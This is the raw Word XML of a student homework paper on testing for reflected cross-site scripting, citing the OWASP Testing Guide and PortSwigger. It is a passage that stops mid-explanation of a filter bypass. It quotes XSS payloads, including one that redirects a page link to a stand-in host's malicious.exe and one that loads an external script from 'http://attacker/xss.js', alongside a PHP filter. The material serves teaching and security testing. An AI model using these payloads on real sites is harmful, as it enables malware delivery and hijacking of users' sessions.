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C6EB9B" wp14:paraId="782D90A0" wp14:textId="4DBD548B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58EAADA">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Mark Kardash</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="7CC6EB9B" wp14:paraId="7A5773B0" wp14:textId="0C8B926A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7E00AEA3" wp14:textId="279EE459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4E658F73" wp14:textId="0037BFC2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58EAADA">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Professor Carl Eyler</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="7CC6EB9B" wp14:paraId="24360B41" wp14:textId="014BF2FA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45F0026D" wp14:textId="22FF1911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6F28A2B3" wp14:textId="42B458E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58EAADA">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>SDEV 460 7380: Software Security Testing</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="7CC6EB9B" wp14:paraId="5CDC0CCB" wp14:textId="4938D4AD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466EBAF8" wp14:textId="65099EB4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46536744" wp14:textId="6A78E2B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1EA6C11">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Homework 4: Input Validation and Business Logic Security Controls</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="7CC6EB9B" wp14:paraId="3E8BC932" wp14:textId="3CA60E00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4EDBF3CC" wp14:textId="70EA46D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1581074B" wp14:textId="66DFD8A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1EA6C11">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>7 May 2024</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="7CC6EB9B" wp14:paraId="0AB79FFC" wp14:textId="0A0C1C72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6A6A8699" wp14:textId="62F1BFFA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1D3822AD" wp14:textId="67ABECB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1EA6C11">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>University of Maryland Global Campus</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="7CC6EB9B" wp14:paraId="2B0130EE" wp14:textId="5D0EC898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64BD40B3" wp14:textId="795A9499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312FB982" wp14:textId="3B87EFD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CC6EB9B" wp14:paraId="2C078E63" wp14:textId="0B51AAB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E6A3D47">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">In this document, I will be describing </w:t>
      </w:r>
      <w:r w:rsidRPr="7CC6EB9B" w:rsidR="67D3A727">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">the various validation controls assigned </w:t>
      </w:r>
      <w:r w:rsidRPr="7CC6EB9B" w:rsidR="33E84E83">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">to me in Homework 4 of the SDEV460 course. The paper will </w:t>
      </w:r>
      <w:r w:rsidRPr="7CC6EB9B" w:rsidR="2B1C4A2D">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>be split into categories</w:t>
      </w:r>
      <w:r w:rsidRPr="7CC6EB9B" w:rsidR="1D1DD51B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">, for a </w:t>
      </w:r>
      <w:r w:rsidRPr="7CC6EB9B" w:rsidR="1D1DD51B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>more clear and</w:t>
      </w:r>
      <w:r w:rsidRPr="7CC6EB9B" w:rsidR="1D1DD51B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> structured</w:t>
      </w:r>
      <w:r w:rsidRPr="7CC6EB9B" w:rsidR="1D1DD51B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> analysis. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="5D17E4CA" w:rsidP="7CC6EB9B" w:rsidRDefault="5D17E4CA" w14:paraId="5DA77B89" w14:textId="1C8E655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C6EB9B" w:rsidR="1D1DD5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Testing For Re</w:t>
      </w:r>
      <w:r w:rsidRPr="7CC6EB9B" w:rsidR="3F19E8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flected</w:t>
      </w:r>
      <w:r w:rsidRPr="7CC6EB9B" w:rsidR="1D1DD5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Cross-Site Scripting (OTG-INPVAL-001)</w:t>
      </w:r>
      <w:r w:rsidRPr="7CC6EB9B" w:rsidR="4332A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C2FE146" w:rsidP="7CC6EB9B" w:rsidRDefault="7C2FE146" w14:paraId="1ECBCBDE" w14:textId="328B94F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4332A0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</w:t>
      </w:r>
      <w:r w:rsidRPr="7CC6EB9B" w:rsidR="4969A5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flected Cross-Site Scripting is a vulnerability </w:t>
      </w:r>
      <w:r w:rsidRPr="7CC6EB9B" w:rsidR="5A850A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 an HTTP response has malicious code injected into it by attackers.</w:t>
      </w:r>
      <w:r w:rsidRPr="7CC6EB9B" w:rsidR="48BAC6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 is then sent a link or button, which, if they click or press, will inject the malicious</w:t>
      </w:r>
      <w:r w:rsidRPr="7CC6EB9B" w:rsidR="3C8EEE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code into their system. </w:t>
      </w:r>
      <w:r w:rsidRPr="7CC6EB9B" w:rsidR="2190D5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Examples of the attack are provided below</w:t>
      </w:r>
      <w:r w:rsidRPr="7CC6EB9B" w:rsidR="19F01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with the first one being the author’s own, albeit modeled after one found on Port</w:t>
      </w:r>
      <w:r w:rsidRPr="7CC6EB9B" w:rsidR="492913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Swinger.com, </w:t>
      </w:r>
      <w:r w:rsidRPr="7CC6EB9B" w:rsidR="0583F6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the other three taken directly from the OWASP Testing Guide.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="142CC7F1" w:rsidP="7CC6EB9B" w:rsidRDefault="142CC7F1" w14:paraId="2EC90989" w14:textId="0CD3749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353084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Example 1: </w:t>
      </w:r>
      <w:r w:rsidRPr="7CC6EB9B" w:rsidR="68BA34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Inserting Malicious Code</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="142CC7F1" w:rsidP="7CC6EB9B" w:rsidRDefault="142CC7F1" w14:paraId="5D9A56AB" w14:textId="7730171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353084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Let us suppose we have a webpage with the following </w:t>
      </w:r>
      <w:r w:rsidRPr="7CC6EB9B" w:rsidR="041D48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URL</w:t>
      </w:r>
      <w:r w:rsidRPr="7CC6EB9B" w:rsidR="47D344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Belonging to a</w:t>
      </w:r>
      <w:r w:rsidRPr="7CC6EB9B" w:rsidR="43AC29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 </w:t>
      </w:r>
      <w:r w:rsidRPr="7CC6EB9B" w:rsidR="7E798B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unsafe </w:t>
      </w:r>
      <w:r w:rsidRPr="7CC6EB9B" w:rsidR="43AC29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online commerce website</w:t>
      </w:r>
      <w:r w:rsidRPr="7CC6EB9B" w:rsidR="041D48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95154EA" w:rsidP="7CC6EB9B" w:rsidRDefault="095154EA" w14:paraId="24AD2097" w14:textId="28AB841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hyperlink r:id="Rcc8689fc0cc14c6b">
        <w:r w:rsidRPr="7CC6EB9B" w:rsidR="789D2B8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</w:t>
        </w:r>
        <w:r w:rsidRPr="7CC6EB9B" w:rsidR="06CD5A5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everything</w:t>
        </w:r>
        <w:r w:rsidRPr="7CC6EB9B" w:rsidR="789D2B8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-</w:t>
        </w:r>
        <w:r w:rsidRPr="7CC6EB9B" w:rsidR="5FB9490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shop</w:t>
        </w:r>
        <w:r w:rsidRPr="7CC6EB9B" w:rsidR="789D2B8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.net/search?</w:t>
        </w:r>
        <w:r w:rsidRPr="7CC6EB9B" w:rsidR="62848BE2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term=item</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="3515C258" w:rsidP="7CC6EB9B" w:rsidRDefault="3515C258" w14:paraId="6735CB86" w14:textId="7B2276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308489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When this URL </w:t>
      </w:r>
      <w:r w:rsidRPr="7CC6EB9B" w:rsidR="66622F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is entered into a search engine, the program </w:t>
      </w:r>
      <w:r w:rsidRPr="7CC6EB9B" w:rsidR="51FEB6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will recognize the search term “item</w:t>
      </w:r>
      <w:r w:rsidRPr="7CC6EB9B" w:rsidR="51FEB6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7CC6EB9B" w:rsidR="51FEB6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</w:t>
      </w:r>
      <w:r w:rsidRPr="7CC6EB9B" w:rsidR="26099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includes it in the response, like this:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="63E406E3" w:rsidP="7CC6EB9B" w:rsidRDefault="63E406E3" w14:paraId="17220EB6" w14:textId="674DC18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26099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&lt;p&gt; You searched for</w:t>
      </w:r>
      <w:r w:rsidRPr="7CC6EB9B" w:rsidR="21B927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 item&lt;/p&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="6D76CBEC" w:rsidP="7CC6EB9B" w:rsidRDefault="6D76CBEC" w14:paraId="1826CDAF" w14:textId="6F6722B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8AD72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 the above example, </w:t>
      </w:r>
      <w:r w:rsidRPr="7CC6EB9B" w:rsidR="6B8513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user simply </w:t>
      </w:r>
      <w:r w:rsidRPr="7CC6EB9B" w:rsidR="6B8513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</w:t>
      </w:r>
      <w:r w:rsidRPr="7CC6EB9B" w:rsidR="6B8513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access a particular item being sold on the </w:t>
      </w:r>
      <w:r w:rsidRPr="7CC6EB9B" w:rsidR="3887D0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website and</w:t>
      </w:r>
      <w:r w:rsidRPr="7CC6EB9B" w:rsidR="6B8513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7C8576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does not perform any further actions. Should it </w:t>
      </w:r>
      <w:r w:rsidRPr="7CC6EB9B" w:rsidR="008FD1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remain that way, a potential attacker could </w:t>
      </w:r>
      <w:r w:rsidRPr="7CC6EB9B" w:rsidR="19535C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make the following injection:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="1E9805F7" w:rsidP="7CC6EB9B" w:rsidRDefault="1E9805F7" w14:paraId="6004356C" w14:textId="23E05ED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hyperlink r:id="Ra7f13fe817e74431">
        <w:r w:rsidRPr="7CC6EB9B" w:rsidR="19535C8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</w:t>
        </w:r>
        <w:r w:rsidRPr="7CC6EB9B" w:rsidR="4DED681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://everything-shop.net/search?</w:t>
        </w:r>
        <w:r w:rsidRPr="7CC6EB9B" w:rsidR="08FB42D7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term=&lt;script&gt;/*+</w:t>
        </w:r>
        <w:r w:rsidRPr="7CC6EB9B" w:rsidR="58AF482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MaliciousCodeThatDoomsTheApp+</w:t>
        </w:r>
        <w:r w:rsidRPr="7CC6EB9B" w:rsidR="2AE9975F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*/&lt;/script</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="7CC6EB9B" w:rsidR="2AE997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</w:p>
    <w:p w:rsidR="195C916A" w:rsidP="7CC6EB9B" w:rsidRDefault="195C916A" w14:paraId="1845418A" w14:textId="73B0EA3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06F5BB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this is successful, </w:t>
      </w:r>
      <w:r w:rsidRPr="7CC6EB9B" w:rsidR="6A6EA6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system will respond with the following output:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="4B03B931" w:rsidP="7CC6EB9B" w:rsidRDefault="4B03B931" w14:paraId="48B39CD5" w14:textId="5AA38EB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6A6EA6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&lt;p&gt;You searched for: &lt;scrip</w:t>
      </w:r>
      <w:r w:rsidRPr="7CC6EB9B" w:rsidR="02A112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t&gt;/*</w:t>
      </w:r>
      <w:r w:rsidRPr="7CC6EB9B" w:rsidR="02A112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MaliciousCodeThatDoomsTheApp</w:t>
      </w:r>
      <w:r w:rsidRPr="7CC6EB9B" w:rsidR="02A112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/&lt;</w:t>
      </w:r>
      <w:r w:rsidRPr="7CC6EB9B" w:rsidR="7EF88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/script&gt;&lt;/p&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="06F268C6" w:rsidP="7CC6EB9B" w:rsidRDefault="06F268C6" w14:paraId="06EA17B3" w14:textId="3DEC998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26BC77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happens next </w:t>
      </w:r>
      <w:r w:rsidRPr="7CC6EB9B" w:rsidR="78ABE9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that if any of the application’s users</w:t>
      </w:r>
      <w:r w:rsidRPr="7CC6EB9B" w:rsidR="1B7112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makes a request for this URL, the malicious script created by the hacker </w:t>
      </w:r>
      <w:r w:rsidRPr="7CC6EB9B" w:rsidR="237817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 execute in the browser of the vi</w:t>
      </w:r>
      <w:r w:rsidRPr="7CC6EB9B" w:rsidR="3ACBE7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ctim. </w:t>
      </w:r>
      <w:r w:rsidRPr="7CC6EB9B" w:rsidR="77E599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Once this is done, the hacker now has access to </w:t>
      </w:r>
      <w:r w:rsidRPr="7CC6EB9B" w:rsidR="7B34F9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 piece of data that the user does. M</w:t>
      </w:r>
      <w:r w:rsidRPr="7CC6EB9B" w:rsidR="284FE3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oreover, they can also </w:t>
      </w:r>
      <w:r w:rsidRPr="7CC6EB9B" w:rsidR="284FE3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modify</w:t>
      </w:r>
      <w:r w:rsidRPr="7CC6EB9B" w:rsidR="284FE3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application in any</w:t>
      </w:r>
      <w:r w:rsidRPr="7CC6EB9B" w:rsidR="393B0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CC6EB9B" w:rsidR="284FE3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way that the user can, </w:t>
      </w:r>
      <w:r w:rsidRPr="7CC6EB9B" w:rsidR="38ED92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now having gained the same privileges</w:t>
      </w:r>
      <w:r w:rsidRPr="7CC6EB9B" w:rsidR="1FAD9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7CC6EB9B" w:rsidR="1FAD9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PortSwinger</w:t>
      </w:r>
      <w:r w:rsidRPr="7CC6EB9B" w:rsidR="1FAD9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n.d.). </w:t>
      </w:r>
      <w:r w:rsidRPr="7CC6EB9B" w:rsidR="38ED92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example, </w:t>
      </w:r>
      <w:r w:rsidRPr="7CC6EB9B" w:rsidR="4E5A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they may </w:t>
      </w:r>
      <w:r w:rsidRPr="7CC6EB9B" w:rsidR="4E5A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7CC6EB9B" w:rsidR="4E5AAF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item from the user’s basket, or, on the contrary, order a large quantity of that item, w</w:t>
      </w:r>
      <w:r w:rsidRPr="7CC6EB9B" w:rsidR="5FF31B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hich the user will be charged for. </w:t>
      </w:r>
      <w:r w:rsidRPr="7CC6EB9B" w:rsidR="036DAC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may be even worse is that the hacker will now be able to interact with other users, while disguising themselves as the </w:t>
      </w:r>
      <w:r w:rsidRPr="7CC6EB9B" w:rsidR="373CCD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under attack.</w:t>
      </w:r>
      <w:r w:rsidRPr="7CC6EB9B" w:rsidR="28EFB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While not much person-to-person interaction usually</w:t>
      </w:r>
      <w:r w:rsidRPr="7CC6EB9B" w:rsidR="58B7B8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takes place </w:t>
      </w:r>
      <w:r w:rsidRPr="7CC6EB9B" w:rsidR="28EFB5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a shopping website</w:t>
      </w:r>
      <w:r w:rsidRPr="7CC6EB9B" w:rsidR="7133E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this will allow the hacker to spread the att</w:t>
      </w:r>
      <w:r w:rsidRPr="7CC6EB9B" w:rsidR="23601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ack across more accounts</w:t>
      </w:r>
      <w:r w:rsidRPr="7CC6EB9B" w:rsidR="38CBE2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7CC6EB9B" w:rsidR="38CBE2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PortSwinger</w:t>
      </w:r>
      <w:r w:rsidRPr="7CC6EB9B" w:rsidR="38CBE2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n.d.).</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="7D4C8DE8" w:rsidP="7CC6EB9B" w:rsidRDefault="7D4C8DE8" w14:paraId="5A823251" w14:textId="163D18E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700D53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Example 2:</w:t>
      </w:r>
      <w:r w:rsidRPr="7CC6EB9B" w:rsidR="5109DB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Downloading Malicious File</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="21263C4F" w:rsidP="7CC6EB9B" w:rsidRDefault="21263C4F" w14:paraId="3D201301" w14:textId="727E09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109DB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this example, we are presented with</w:t>
      </w:r>
      <w:r w:rsidRPr="7CC6EB9B" w:rsidR="690904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following URL:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0EB59CA3" w:rsidP="7CC6EB9B" w:rsidRDefault="0EB59CA3" w14:paraId="71F9A7EA" w14:textId="0B56274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hyperlink r:id="R801b7316e3914d18">
        <w:r w:rsidRPr="7CC6EB9B" w:rsidR="1D6A9B5D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http://example.com/index.php</w:t>
        </w:r>
        <w:r w:rsidRPr="7CC6EB9B" w:rsidR="48994247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?user=&lt;script&gt;window.</w:t>
        </w:r>
        <w:r w:rsidRPr="7CC6EB9B" w:rsidR="6C309A6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onload</w:t>
        </w:r>
      </w:hyperlink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function(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{var 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AllLinks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document.getElementsByTagName</w:t>
      </w:r>
      <w:r w:rsidRPr="7CC6EB9B" w:rsidR="67431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(“a”);</w:t>
      </w:r>
      <w:r w:rsidRPr="7CC6EB9B" w:rsidR="5FBEF1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AllLinks</w:t>
      </w:r>
      <w:r w:rsidRPr="7CC6EB9B" w:rsidR="5FBEF1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[0].</w:t>
      </w:r>
      <w:r w:rsidRPr="7CC6EB9B" w:rsidR="5FBEF1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href</w:t>
      </w:r>
      <w:r w:rsidRPr="7CC6EB9B" w:rsidR="5FBEF1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“</w:t>
      </w:r>
      <w:hyperlink r:id="Rd36cd2f0e216490d">
        <w:r w:rsidRPr="7CC6EB9B" w:rsidR="5FBEF15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http://ba</w:t>
        </w:r>
        <w:r w:rsidRPr="7CC6EB9B" w:rsidR="2B6E00C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dexample.com/malicious.exe;}&lt;/script</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="7CC6EB9B" w:rsidR="2B6E00C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</w:p>
    <w:p w:rsidR="3885A3DB" w:rsidP="7CC6EB9B" w:rsidRDefault="3885A3DB" w14:paraId="23C75AE6" w14:textId="4FA9EDF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077F8BC" w:rsidP="7CC6EB9B" w:rsidRDefault="4077F8BC" w14:paraId="0791C7B5" w14:textId="3FCEE0A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CE9AD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(Code from OWASP Testing Guide, Version 4.0</w:t>
      </w:r>
      <w:r w:rsidRPr="7CC6EB9B" w:rsidR="3CB66E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</w:t>
      </w:r>
      <w:r w:rsidRPr="7CC6EB9B" w:rsidR="1CE9AD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).</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="4077F8BC" w:rsidP="7CC6EB9B" w:rsidRDefault="4077F8BC" w14:paraId="524CB870" w14:textId="0F375DC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CE9AD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Let us now assume that this is a software or file downloading app, such as </w:t>
      </w:r>
      <w:r w:rsidRPr="7CC6EB9B" w:rsidR="140AE5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site to download gaming software, or one of the </w:t>
      </w:r>
      <w:r w:rsidRPr="7CC6EB9B" w:rsidR="75FC18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fraudulent “study help” websites that have flooded the internet. The downloadable fil</w:t>
      </w:r>
      <w:r w:rsidRPr="7CC6EB9B" w:rsidR="07D4D9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may </w:t>
      </w:r>
      <w:r w:rsidRPr="7CC6EB9B" w:rsidR="07D4D9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well</w:t>
      </w:r>
      <w:r w:rsidRPr="7CC6EB9B" w:rsidR="07D4D95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have the name of a particular assignment that the user/student wants to access. </w:t>
      </w:r>
      <w:r w:rsidRPr="7CC6EB9B" w:rsidR="38FCD18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However, what they really do download by clicking on the link is a file full of malicious code that the attacker has prepared.</w:t>
      </w:r>
      <w:r w:rsidRPr="7CC6EB9B" w:rsidR="69D8A2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As soon as the link is clicked on, the downloaded file begins spreading a virus across the user’s computer</w:t>
      </w:r>
      <w:r w:rsidRPr="7CC6EB9B" w:rsidR="151376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(OWASP Testing Guide, Version 4.0</w:t>
      </w:r>
      <w:r w:rsidRPr="7CC6EB9B" w:rsidR="42EA1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</w:t>
      </w:r>
      <w:r w:rsidRPr="7CC6EB9B" w:rsidR="151376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  <w:r w:rsidRPr="7CC6EB9B" w:rsidR="69D8A2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7CC6EB9B" w:rsidR="1732CE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virus, dep</w:t>
      </w:r>
      <w:r w:rsidRPr="7CC6EB9B" w:rsidR="2E23F7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ending on its nature, can do a variety of things. It may corrupt important files, </w:t>
      </w:r>
      <w:r w:rsidRPr="7CC6EB9B" w:rsidR="26842E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copy</w:t>
      </w:r>
      <w:r w:rsidRPr="7CC6EB9B" w:rsidR="26842E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send sensitive data to the attacker, </w:t>
      </w:r>
      <w:r w:rsidRPr="7CC6EB9B" w:rsidR="305D8E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or even </w:t>
      </w:r>
      <w:r w:rsidRPr="7CC6EB9B" w:rsidR="305D8E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render</w:t>
      </w:r>
      <w:r w:rsidRPr="7CC6EB9B" w:rsidR="305D8E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victim’s entire computer inoperable. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="01CF60B8" w:rsidP="7CC6EB9B" w:rsidRDefault="01CF60B8" w14:paraId="1929C3C4" w14:textId="0312A55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324A0E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Example 3: </w:t>
      </w:r>
      <w:r w:rsidRPr="7CC6EB9B" w:rsidR="7F9A3E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Bypassing Protection</w:t>
      </w:r>
      <w:r w:rsidRPr="7CC6EB9B" w:rsidR="5CD7DB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Against External Scripts</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="2201B51E" w:rsidP="7CC6EB9B" w:rsidRDefault="2201B51E" w14:paraId="59B52814" w14:textId="46B4F0D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323522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One of the most common protection methods against reflected cross-site scripting is</w:t>
      </w:r>
      <w:r w:rsidRPr="7CC6EB9B" w:rsidR="3960416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inclusion of code that prevents attackers from inserting external scripts into the a</w:t>
      </w:r>
      <w:r w:rsidRPr="7CC6EB9B" w:rsidR="4A7FBB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pplication. The code is shown below:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="39BBFE6A" w:rsidP="7CC6EB9B" w:rsidRDefault="39BBFE6A" w14:paraId="74694316" w14:textId="76702F7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1BE7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&lt;?</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="39BBFE6A" w:rsidP="7CC6EB9B" w:rsidRDefault="39BBFE6A" w14:paraId="75DC0CF9" w14:textId="5D2697D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1BE7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$re = “/&lt;</w:t>
      </w:r>
      <w:r w:rsidRPr="7CC6EB9B" w:rsidR="51BE7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script[</w:t>
      </w:r>
      <w:r w:rsidRPr="7CC6EB9B" w:rsidR="51BE7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^</w:t>
      </w:r>
      <w:r w:rsidRPr="7CC6EB9B" w:rsidR="51BE7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]+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src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”;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="132C0CC1" w:rsidP="7CC6EB9B" w:rsidRDefault="132C0CC1" w14:paraId="66D7BBDD" w14:textId="47235D3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(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preg_match</w:t>
      </w:r>
      <w:r w:rsidRPr="7CC6EB9B" w:rsidR="2FBF93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7CC6EB9B" w:rsidR="5231DE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$re, $_GET[‘var’]))</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="3789FAEF" w:rsidP="7CC6EB9B" w:rsidRDefault="3789FAEF" w14:paraId="5DC721B5" w14:textId="72B7396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5C1D1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{</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="3789FAEF" w:rsidP="7CC6EB9B" w:rsidRDefault="3789FAEF" w14:paraId="06DE4F1C" w14:textId="576DBA7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5C1D1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echo “</w:t>
      </w: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Filtered</w:t>
      </w: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”;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="5F900A19" w:rsidP="7CC6EB9B" w:rsidRDefault="5F900A19" w14:paraId="6D97B538" w14:textId="64F042A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return;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="5F900A19" w:rsidP="7CC6EB9B" w:rsidRDefault="5F900A19" w14:paraId="4B195F97" w14:textId="0F250E2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}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="5F900A19" w:rsidP="7CC6EB9B" w:rsidRDefault="5F900A19" w14:paraId="014581CD" w14:textId="49B4FD4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echo “Welcome </w:t>
      </w:r>
      <w:r w:rsidRPr="7CC6EB9B" w:rsidR="470E92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“.</w:t>
      </w:r>
      <w:r w:rsidRPr="7CC6EB9B" w:rsidR="49D530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$</w:t>
      </w:r>
      <w:r w:rsidRPr="7CC6EB9B" w:rsidR="49D530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_GET[‘var’].</w:t>
      </w:r>
      <w:r w:rsidRPr="7CC6EB9B" w:rsidR="49D530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 !</w:t>
      </w:r>
      <w:r w:rsidRPr="7CC6EB9B" w:rsidR="49D530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”;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="35C5B0B1" w:rsidP="7CC6EB9B" w:rsidRDefault="35C5B0B1" w14:paraId="61194C87" w14:textId="5C1ABB7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EEB2D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?&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="3D08C8FC" w:rsidP="7CC6EB9B" w:rsidRDefault="3D08C8FC" w14:paraId="636A4964" w14:textId="7FB16DF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5B29C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(Code from OWASP Testing Guide, Version 4.0</w:t>
      </w:r>
      <w:r w:rsidRPr="7CC6EB9B" w:rsidR="0FA2E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</w:t>
      </w:r>
      <w:r w:rsidRPr="7CC6EB9B" w:rsidR="55B29C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). </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="110DD19D" w:rsidP="7CC6EB9B" w:rsidRDefault="110DD19D" w14:paraId="2DEF9A15" w14:textId="7024D6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7E0676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code shown above is an “if”-loop checking if the application code has been “filtered</w:t>
      </w:r>
      <w:r w:rsidRPr="7CC6EB9B" w:rsidR="7E0676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”.</w:t>
      </w:r>
      <w:r w:rsidRPr="7CC6EB9B" w:rsidR="7E0676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 other words</w:t>
      </w:r>
      <w:r w:rsidRPr="7CC6EB9B" w:rsidR="5ADED4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7CC6EB9B" w:rsidR="4E9B4D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checks to make sure that </w:t>
      </w:r>
      <w:r w:rsidRPr="7CC6EB9B" w:rsidR="10A27C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character ‘&gt;’ does not get inserted into a script</w:t>
      </w:r>
      <w:r w:rsidRPr="7CC6EB9B" w:rsidR="1B7607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7CC6EB9B" w:rsidR="7CE1E31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is because the character is often used in </w:t>
      </w:r>
      <w:r w:rsidRPr="7CC6EB9B" w:rsidR="1C51581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cross-site scripting attacks, such as:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="752C1841" w:rsidP="7CC6EB9B" w:rsidRDefault="752C1841" w14:paraId="355BB729" w14:textId="103875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7C3723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&lt;script </w:t>
      </w:r>
      <w:r w:rsidRPr="7CC6EB9B" w:rsidR="7C3723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src</w:t>
      </w:r>
      <w:r w:rsidRPr="7CC6EB9B" w:rsidR="7C3723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</w:t>
      </w:r>
      <w:r w:rsidRPr="7CC6EB9B" w:rsidR="0BA2B53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</w:t>
      </w:r>
      <w:hyperlink r:id="Rddab074078f8484e">
        <w:r w:rsidRPr="7CC6EB9B" w:rsidR="0BA2B53D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http://attacker/xss.js”&gt;&lt;</w:t>
        </w:r>
        <w:r w:rsidRPr="7CC6EB9B" w:rsidR="585E969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/script</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="7CC6EB9B" w:rsidR="585E96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</w:p>
    <w:p w:rsidR="770B051D" w:rsidP="7CC6EB9B" w:rsidRDefault="770B051D" w14:paraId="79911ADF" w14:textId="5EC858E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81E41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(OWASP Testing Guide, Version 4.0., 2011).</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="3DD28B26" w:rsidP="7CC6EB9B" w:rsidRDefault="3DD28B26" w14:paraId="6D4E31BF" w14:textId="64F4E6E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4A70DB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Normally, an “if” loop like the one </w:t>
      </w:r>
      <w:r w:rsidRPr="7CC6EB9B" w:rsidR="4A70DB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presented should handle </w:t>
      </w:r>
      <w:r w:rsidRPr="7CC6EB9B" w:rsidR="4D642A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very well, filtering</w:t>
      </w:r>
      <w:r w:rsidRPr="7CC6EB9B" w:rsidR="13DC3E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any instances of the ‘&gt;’ character.</w:t>
      </w:r>
      <w:r w:rsidRPr="7CC6EB9B" w:rsidR="13DC3E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However, there is a way to bypass this </w:t>
      </w:r>
      <w:r w:rsidRPr="7CC6EB9B" w:rsidR="15CDA0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control: Attackers can place the ‘&gt;’ </w:t>
      </w:r>
      <w:r w:rsidRPr="7CC6EB9B" w:rsidR="5A011B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as part of an attribute, </w:t>
      </w:r>
